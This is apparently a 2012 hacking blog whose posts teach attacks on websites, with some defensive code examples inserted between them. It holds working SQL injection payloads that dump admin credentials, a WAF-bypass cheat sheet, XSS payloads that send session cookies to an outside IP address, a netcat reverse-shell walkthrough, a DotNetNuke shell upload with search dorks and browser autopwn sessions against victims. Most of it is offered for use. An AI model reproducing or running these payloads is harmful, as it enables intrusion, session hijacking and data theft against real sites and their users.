Wednesday 28 November 2012

Ajith KP

SYMLINK Tutorial

A symlink attack is a type of attack that lets an attacker access the directories of other websites hosted on the same server.

Needed

 SYMLINK Shell --> here

Steps in image

I have noticed someone copying content without giving any credit. Please do not do this...








I haven't explained anything... Even so, from the images you can predict what's going on...
Please write comments and share with your hacker friends...


Monday 26 November 2012

Ajith KP

SYMLINKER

I have coded a simple automated SYMLINKER with very few functions. Symlink is a type of attack in which the attacker gets unauthorized access to other websites' directories on the same server.










Download from here.

Thursday 22 November 2012

Ajith KP

Reverse Connection using NetCat

Netcat is a hacking tool used to accept reverse connections and for tunneling. [Weevely tunneling: here]

Needed

  • Reverse connecting PHP application [here or use your fav. shell with reverse connecting funct.]
  • NetCat
Here I'm not going to r00t this server. Just pWning reverse connection.

Here I have successfully created a reverse connection to my port 443 [you can use unreserved ports]

Now open traditional NetCat[in Linux].

Become super user and execute command "nc -l -p 443"

Linux NetCat

Windows NetCat













Friday 9 November 2012

Ajith KP

Adobe Reader X/XI zero-day flaw found by Group-IB

Cyber crime investigation company Group-IB [Russia] has discovered a zero-day Adobe Reader X and XI exploit that is immune to the program's new Protected Mode.
The exploit is now in use in a private, modified version of the BlackHole Exploit Kit.






Please view the video posted by the Group-IB.





Share this new threat in the cyber world and alert your friends.
Ajith KP

SQLi - Tutorial Part 2 [BOOLEAN BASED]

SQLi part 1 : http://terminalcoders.blogspot.in/2012/11/sql-injection-tutorial-for-beginners.html

READ New Part

Counting Total Column




"+ORDER+BY+1--" --> No Error
"+ORDER+BY+2--" --> No Error
"+ORDER+BY+3--" --> No Error
"+ORDER+BY+4--" --> No Error
"+ORDER+BY+5--" --> No Error
"+ORDER+BY+6--" --> Error


Total Column number=5.

Finding vulnerable column

"+union+select+1,2,3,4,5--" --> Nothing happened.

But nothing happens in this session. Error message: "different number of columns"

So I add an error function "AND+1=2" to the URL.

"+and+1=2+union+select+1,2,3,4,5--"

Now OK, the vulnerable column is 2.








This type of SQL Injection is called "BOOLEAN BASED" SQLi.


Thursday 8 November 2012

Ajith KP

Palindrome Checker in C

It's a BCA practical examination question.



Wednesday 7 November 2012

Ajith KP

XSS ---> Theft Session Cookies Full Tutorial

XSS / CSS stands for Cross Site Scripting.
XSS is used for client-side attacks. It allows client-side defacement and theft of session cookies.

Finding XSS vulnerability:

search.php?q=<script>alert("Ajithkp560 was Here")</script>
search.php?q=<script>alert("Ajithkp560 was Here");</script>
search.php?q=alert%28%5C%22Ajithkp560%20was%20Here%5C%22%29%3C%2Fscript%3E
search.php?q=%3Cscript%3Ealert%28%5C%22Ajithkp560%20was%20Here%5C%22%29%3B%3C%2Fscript%3E
search.php?q=';%20alert("Ajithkp560%20was%20here%20%3Ap");%20'
search.php?q=”><script>alert("Ajithkp560 was here")%3B<%2Fscript>


Look at the image above... This is called client-side defacement.

Now let's dig out the session cookies.

Let's alert(document.cookie)











Now we can redirect the victim to our malicious PHP application. Here I'm using the PHP file stored on my personal server.



Download malicious PHP application from: http://ajithkp560.hostei.com/php/xss

1. search.php?q=<script>location.href='http://49.200.141.215/xss.php?cookie='+document.cookie;</script>
2. search.php?q=<script>window.location='http://49.200.141.215/xss.php?cookie='+document.cookie;</script>
3. search.php?q=<script>document.location='http://49.200.141.215/xss.php?cookie='+document.cookie;</script>
JavaScript to redirect to my malicious PHP file

Redirected to my Malicious PHP file

Now folks, check out my directory, which stores xss.php.

Now let's open "configurations.txt".
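The server-side controls that break the chain described above, as an added example that is not part of the original post: output encoding for the reflected `q` value and an HttpOnly session cookie that `document.cookie` cannot read. The function names, the cookie name `session` and the policy string are assumptions, and the probe strings are constructed after the ones listed in the post.

```python
import html
import json
from http.cookies import SimpleCookie

def render_results(q: str) -> str:
    # HTML body context: escape & < > " ' so the reflected value stays text.
    return "<p>Results for: " + html.escape(q, quote=True) + "</p>"

def js_literal(q: str) -> str:
    # JavaScript string context (the "';alert(...);'" style probe): emit a JSON
    # string, then escape < > & so "</script>" cannot close the script block.
    out = json.dumps(q)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
        out = out.replace(ch, esc)
    return out

def session_cookie(session_id: str) -> str:
    # HttpOnly keeps the cookie out of document.cookie; Secure and SameSite
    # restrict where the browser sends it. "session" is an assumed name.
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = True
    cookie["session"]["samesite"] = "Lax"
    cookie["session"]["path"] = "/"
    return cookie["session"].OutputString()

# Second layer: a policy under which inline <script> is refused even if an
# escaping bug slips through (assumed policy, adjust to the site's assets).
CSP_HEADER = ("Content-Security-Policy", "default-src 'self'; script-src 'self'")

# Constructed probe strings, modelled on the ones listed in the post.
PROBES = [
    '<script>alert("x")</script>',
    '"><script>alert(document.cookie);</script>',
    "'; alert(\"x\"); '",
]

if __name__ == "__main__":
    for probe in PROBES:
        print(render_results(probe))
        print("var q = " + js_literal(probe) + ";")
    print("Set-Cookie: " + session_cookie("constructed-session-id"))
```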







Some tricks, tools and abilities you need


  • Firefox
  • Firefox add-on Cookies Manager+ [for editing the value of cookies in your Firefox browser]
  • High talent in social engineering
  • Some known tricks like "Shortening URLs [e.g. http://cjb.net]", hex-encoding URLs, etc.

Dedicated to OPENFIRE Members... ALEX, thanks for reminding me about this...

Don't click unknown links.
Ajith KP

WAF Bypass for beginners

WAF stands for Web Application Firewall. A WAF bypass is used to get past a 403 Forbidden response.





Look at the image above. We didn't successfully execute "union+select 1,2,3,4,5,6,7,8--".

Here we use advanced tricks in SQL injection. It is called WAF bypass.

Here is one example of a WAF bypass:

"union(select 1,2,3,4,5,6,7,8)--"







Look at the picture above: I have successfully executed the SQL function.

A cheat sheet for WAF bypass on "UNION SELECT"

"UnioN SelecT" --> [Mix of capital and small letters]
"/*!Union*/ /*SelecT*/" --> [Those who know SQL will recognise the /*!comment syntax*/]
"UNIunionON+SELselectECT" --> [Bypasses a firewall that removes UNION SELECT from the URL]
"%55nion %53elect" --> [%55 = U and %53 = S]
"%23ajithkp560%0aUnIOn%23ajithkp560%0aSeLecT" --> [%23 = #, a single-line comment, and %0a = new line]
"/*&id=*/union/*&id=*/select/*&id=*/" --> [Unwanted comments]
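Read from the defender's side, each entry in the cheat sheet is a normalisation step a filter has to perform before it matches anything. The following added example (not from the original post; function names are assumptions and the sample strings are constructed after the listed forms) canonicalises a parameter value and then tests it for UNION SELECT.

```python
import re
from urllib.parse import unquote_plus

UNION_SELECT = re.compile(r"\bunion\b[\s(]*(?:(?:all|distinct)\b[\s(]*)?select\b")

def canonicalize(raw: str) -> str:
    """Reduce a parameter value to roughly what the SQL parser will act on."""
    s = raw
    for _ in range(3):                       # undo single and double URL encoding
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    # MySQL runs the body of /*! ... */ (also /*!50000 ... */): keep the body.
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s, flags=re.S)
    # Plain /* ... */ comments behave like whitespace.
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    # '#' and '--' comments stop at the newline; the next line still executes.
    s = re.sub(r"(?:#|--(?=\s|$))[^\n]*", " ", s)
    return re.sub(r"\s+", " ", s).strip().lower()

def is_union_select(raw: str) -> bool:
    s = canonicalize(raw)
    if UNION_SELECT.search(s):
        return True
    # "UNIunionON" only works against a filter that deletes keywords once,
    # so simulate that deletion and test what would be left over.
    stripped = re.sub(r"union|select", "", s)
    return stripped != s and bool(UNION_SELECT.search(stripped))

# Constructed samples, one per form in the cheat sheet plus the bracket form.
SAMPLES = [
    "UnioN SelecT 1,2",
    "/*!Union*/ /*!SelecT*/ 1,2",
    "UNIunionON+SELselectECT+1,2",
    "%55nion %53elect 1,2",
    "%23ajithkp560%0aUnIOn%23ajithkp560%0aSeLecT 1,2",
    "/*&id=*/union/*&id=*/select/*&id=*/1,2",
    "union(select 1,2,3,4,5,6,7,8)--",
]
BENIGN = "trade union members select a chair"

if __name__ == "__main__":
    for value in SAMPLES + [BENIGN]:
        print(is_union_select(value), repr(canonicalize(value)))
```

Matching on the canonical form is a detection aid only; the query itself still needs bound parameters.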

Monday 5 November 2012

Ajith KP

DNN Hacking for beginners

DNN stands for DotNetNuke. It has a remote arbitrary file upload vulnerability; simply put, an upload vulnerability.

Finding vulnerable websites

Find vulnerable websites by GOOGLE dorks:

inurl:/fck/fcklinkgallery.aspx
inurl:/tabid/36/language/en-US/Default.aspx

I got a target,





Select "File" from list.

Then in the URL bar paste the JavaScript: javascript:__doPostBack('ctlURL$cmdUpload','')

Now an upload bar appears on the page.






Now upload your ASP shell as "shell.asp;.txt, shell.asp;.jpg,etc"











Your uploads will go to "http://www.site.com/Portals/0/shell.asp;.txt" 
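The upload is dangerous because the client-supplied name is kept and stored under the web root, and IIS 6 treats a name such as shell.asp;.txt as ASP. An added example (not from the original post; the allowlist, function name and sample names are assumptions) of the name handling an upload endpoint should apply instead:

```python
import os
import re
import uuid

# Extensions the application actually needs (assumed allowlist).
ALLOWED = {".txt", ".jpg", ".png", ".pdf"}

# A script extension anywhere in the name, followed by end of name or a
# separator, covers "shell.asp;.txt" and "shell.asp.txt".
SCRIPT_EXT = re.compile(r"\.(asp|aspx|asa|cer|ashx|php|jsp|cgi)(?=$|[.;:/\\ ])", re.I)

def stored_name(client_name: str):
    """Return a server-chosen file name, or None if the upload is rejected."""
    # Drop any path component the client sent.
    base = client_name.replace("\\", "/").rsplit("/", 1)[-1]
    # ';' and ':' have special meaning to IIS/NTFS; NUL truncates in some APIs.
    if not base or any(ch in base for ch in (";", ":", "\x00")):
        return None
    if SCRIPT_EXT.search(base):
        return None
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED:
        return None
    # Never reuse the client's name: store under a random one, ideally
    # outside the web root or in a directory with script execution disabled.
    return uuid.uuid4().hex + ext

if __name__ == "__main__":
    # Constructed sample names.
    for name in ("shell.asp;.txt", "shell.asp;.jpg", "shell.asp.txt",
                 "report.txt", "photo.JPG", "..\\..\\web.config"):
        print(repr(name), "->", stored_name(name))
```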

Sunday 4 November 2012

Ajith KP

SQL Injection tutorial for beginners

SQLi is a hacking technique used to dump a website's database.
It is an old trick, yet even now many websites are vulnerable to SQLi.

TUTORIAL FOR BEGINNERS 

How to find SQLi vulnerability [Google Dorks]: http://pastebin.com/XKttipka

Finding vulnerability:

I got a link with URL http://www.ajithkp560.com/index.php?id=10



Now add a " ' " at the end of the URL. That is http://www.ajithkp560.com/index.php?id=10'
If you get an error message, the website is vulnerable to SQLi.



 

Finding total columns number

Finding columns with the "order by" function
http://www.ajithkp560.com/index.php?id=10+order+by+1--  --> No error
http://www.ajithkp560.com/index.php?id=10+order+by+2--  --> No error
http://www.ajithkp560.com/index.php?id=10+order+by+3--  --> No error
...
...
...
http://www.ajithkp560.com/index.php?id=10+order+by+10-- --> Error



From the error we can understand there are 9 columns.

Finding vulnerable column

The vulnerable column can be found with union+select+1,2,3,...,TotalNumberOfColumns--
i.e., http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,3,4,5,6,7,8,9--

**id=-10 is used to find the vulnerable column.





We can find the SQL version with http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,@@version,4,5,6,7,8,9--

After finding the vulnerable column, we want to grab all tables in the DB [database].
We can grab the tables with the function below:
http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,group_concat(table_name),4,5,6,7,8,9+from+information_schema.tables-- 





Next, grab the columns from a table. We need to encode the table name to hexadecimal.
I'm going to encode the table usuarios_adm to hexadecimal.
Encode it here: http://ajithkp560.hostei.com/online_tools/hexatool.php.
usuarios_adm=7573756172696f735f61646d

Now the URL becomes http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,group_concat(column_name),4,5,6,7,8,9+from+information_schema.columns+where+table_name=0x7573756172696f735f61646d--


** 0xHexValue --> the 0x prefix tells the database that the value is hexadecimal-encoded.

Dumping Data from column

Dump the data with:
http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,group_concat(column_name_1,0x3a, column_name_2,0x3a,....column_name_n,0x3b),4,5,6,7,8,9+from+table_name_xxx--

I have dumped the data here by,
http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,group_concat(user,0x3a,pass,0x3a,email,0x3b),4,5,6,7,8,9+from+usuarios_adm--
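Every step above depends on the `id` value being concatenated into the SQL text. The following added example (not from the original post) puts that pattern beside the fixed one; it uses an in-memory SQLite database with constructed rows in place of the site's MySQL database, so the table layout, function names and the SQLite `||` syntax in the sample value are assumptions.

```python
import re
import sqlite3

def make_db():
    # Constructed data: a 3-column articles table and the admin table named in the post.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (id INTEGER, title TEXT, body TEXT);
        INSERT INTO articles VALUES (10, 'Welcome', 'Hello');
        CREATE TABLE usuarios_adm (user TEXT, pass TEXT, email TEXT);
        INSERT INTO usuarios_adm VALUES ('admin', 'constructed-hash', 'admin@example.test');
    """)
    return db

QUERY = "SELECT id, title, body FROM articles WHERE id = "

def article_vulnerable(db, raw_id: str):
    # The request value becomes part of the SQL text, so the database parses
    # whatever follows the number as SQL.
    return db.execute(QUERY + raw_id).fetchall()

def article_fixed(db, raw_id: str):
    # 1) The parameter is an integer id, so reject anything else outright.
    if not re.fullmatch(r"\d{1,9}", raw_id):
        return []
    # 2) Bind the value; a bound parameter is data and is never parsed as SQL.
    return db.execute(QUERY + "?", (int(raw_id),)).fetchall()

# Constructed request value in the shape the post uses (3 columns here).
SAMPLE = "-10 union select 1,2,group_concat(user||':'||pass) from usuarios_adm--"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", article_vulnerable(db, SAMPLE))   # admin row leaks
    print("fixed:     ", article_fixed(db, SAMPLE))        # []
    print("fixed, id=10:", article_fixed(db, "10"))
```

On the database side, an application account without read access to tables it does not need limits what a missed injection point can reach.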




























Saturday 3 November 2012

Ajith KP

IE9 Memory Corruption Attack

Internet Explorer is vulnerable to many attacks. Memory corruption vulnerabilities have been found many times in Internet Explorer. Before this, a CSS-based memory corruption was found in Internet Explorer.

Metasploit Module for CSS memory corruption attack: http://www.metasploit.com/modules/exploit/windows/browser/ms11_003_ie_css_import [IE 6,7,8]

Here I would like to introduce IE9's memory corruption attack.

Save the PHP code below:



Save it as any name you like, but extension must be php. Open it in your Internet Explorer.



I opened the IE9 browser. Memory usage is only 25,862K.

Now I opened the PHP file saved on my LOCALHOST. 30 seconds after opening the PHP file in my browser: OMG, 1,016,240K memory usage :o




Ajith KP

WEBSPLOIT --> Another AutopWner

WEBSPLOIT is an autopWner like Metasploit.
Websploit is programmed in python and uses Python & Ruby modules.

Commands        Description
--------        -----------
set             Set Value Of Options To Modules
scan            Scan Wifi (Wireless Modules)
stop            Stop Attack & Scan (Wireless Modules)
run             Execute Module
use             Select Module For Use
os              Run Linux Commands(ex : os ifconfig)
back            Exit Current Module
show modules    Show Modules of Current Database
show options    Show Current Options Of Selected Module
upgrade         Get New Version
update          Update Websploit Framework
about           About US



Small Tutorial on WEBSPLOIT

  BROWSER AUTOPWN TUTORIAL


**METASPLOIT must be installed to run this

Setting up of exploit

wsf > use exploit/browser_autopwn 
wsf:Browser_Autopwn > show options

Options      Value          RQ     Description
---------    -----------    ---    ----------------------
Interface    eth0           yes    Network Interface Name
LHOST        192.168.1.1    yes    Local IP Address

wsf:Browser_Autopwn > set LHOST 49.203.197.42
INTERFACE =>  49.203.197.42
wsf:Browser_Autopwn > run



 I got 4 victims ----->>>>> :p > :D > :d

 Now I have connected to Victim 4 by command "sessions -i 4"








By command "shell" I have connected to the victim and executed the shell command "pwd" for the Current Working Directory.

Inform them about browser security and advise them not to use old browsers.

Ajith KP

Finding Network topology using "Netstat" Commands

NETSTAT is the command which is used to find out network topology details.


  • netstat -a          --> List of all ports
  • netstat -t          --> List of TCP ports
  • netstat -u          --> List of UDP ports
  • netstat -l          --> List of listening ports
  • netstat -s          --> Statistics of all ports
  • netstat -p          --> All PID/Program name
  • netstat -i          --> Network interface
  • netstat -r          --> Kernel routing
  • netstat -x          --> All Unix ports
  • netstat --verbose   --> Non supportive address families

Multiple netstat commands

  • netstat -lt         --> Listening TCP ports
  • netstat -lu         --> Listening UDP ports
  • netstat -lx         --> Listening Unix ports
  • netstat -st         --> Statistics of TCP ports
  • netstat -su         --> Statistics of UDP ports